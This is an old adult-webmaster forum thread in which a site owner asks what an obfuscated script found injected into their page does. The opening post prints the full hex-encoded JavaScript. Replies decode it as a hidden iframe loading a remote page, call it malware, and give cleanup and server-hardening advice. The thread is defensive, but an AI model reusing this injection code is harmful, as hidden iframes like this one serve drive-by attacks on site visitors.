GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Script gurus ..Anybody know what this does ??? (https://gfy.com/showthread.php?t=924195)

halfpint 08-27-2009 07:00 AM
Script gurus ..Anybody know what this does ???
 
Found this on one of my mainstream index pages and I dont remember it being there before.

Just wondering if anybody knows what it does/or what its for

I have taken the "script tags" out just in case it is some malacious crap

function v4a90e91dbc9b8(v4a90e91dbcda0){ return(parseInt(v4a90e91dbcda0,16));}function v4a90e91dbe12a(v4a90e91dbe51a){ function v4a90e91dbf0cd () {return 2;} var v4a90e91dbe8ff='';for(v4a90e91dbece9=0; v4a90e91dbece9<v4a90e91dbe51a.length; v4a90e91dbece9+=v4a90e91dbf0cd()){ v4a90e91dbe8ff+=(String.fromCharCode(v4a90e91dbc9b 8(v4a90e91dbe51a.substr(v4a90e91dbece9, v4a90e91dbf0cd()))));}return v4a90e91dbe8ff;} document.write(v4a90e91dbe12a('3C696672616D65206E6 16D653D2737363227207372633D27687474703A2F2F7777772 E676F6F647374756666726576696577732E636F6D2F77702D6 96E636C756465732F706F6D6F2F6B6F6F2F676F2E7068703F7 369643D31272077696474683D373235206865696768743D353 031207374796C653D27646973706C61793A6E6F6E65273E3C2 F696672616D653E'));

katharos 08-27-2009 07:02 AM
looks like some flash action script

halfpint 08-27-2009 07:06 AM
Quote:
Originally Posted by katharos (Post 16241007)
looks like some flash action script
Very weird if it is some flash code as the site does not have any flash on it at all

woj 08-27-2009 07:22 AM
if it's encoded like that 99.99% of the time it's some malicious crap...

halfpint 08-27-2009 07:26 AM
Quote:
Originally Posted by woj (Post 16241053)
if it's encoded like that 99.99% of the time it's some malicious crap...
yep thats what I was thinking .. somebody sure is trying hard to fuck up my websites, first my teen blog got hacked now this crap ..but its all fun and games I guess :Oh crap

spook 08-27-2009 07:27 AM
it appears to be this hexed:

<iframe name='762' src='www dot good stuff reviews dot com/wp-includes/pomo/koo/go.php?sid=1' width=725 height=501 style='display:none'></iframe>

seeandsee 08-27-2009 07:29 AM
Its trojan/virus code

BestXXXPorn 08-27-2009 08:36 AM
Quote:
Originally Posted by spook (Post 16241084)
it appears to be this hexed:

<iframe name='762' src='www dot good stuff reviews dot com/wp-includes/pomo/koo/go.php?sid=1' width=725 height=501 style='display:none'></iframe>
Hhahaha you beat me to it I was just un-encoding that :P

StuartD 08-27-2009 08:38 AM
Quote:
Originally Posted by spook (Post 16241084)
it appears to be this hexed:

<iframe name='762' src='www dot good stuff reviews dot com/wp-includes/pomo/koo/go.php?sid=1' width=725 height=501 style='display:none'></iframe>
Yup, 99% of the time it's an encoded iframe where the page that's included can be just about anything.

halfpint 08-27-2009 08:54 AM
Thanks guys for all of your replys

BenBlingBucks 08-27-2009 09:01 AM
It means tighten up your servers is what it means, stop anal-eyesing and start fixing.

If you didn't put it there and nobody that works for you did either, then odds are you've been breached..... so trying to figure out what it does is secondary.

Re-upload your last good copy of pages.
Check your own PC for trojans/keyloggers.
Change all passwords next.

Then, TIGHTEN your servers... ask your host for their best guy to help look at your servers configuration.

Good luck, peace.
Ben


All times are GMT -7. The time now is 09:45 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc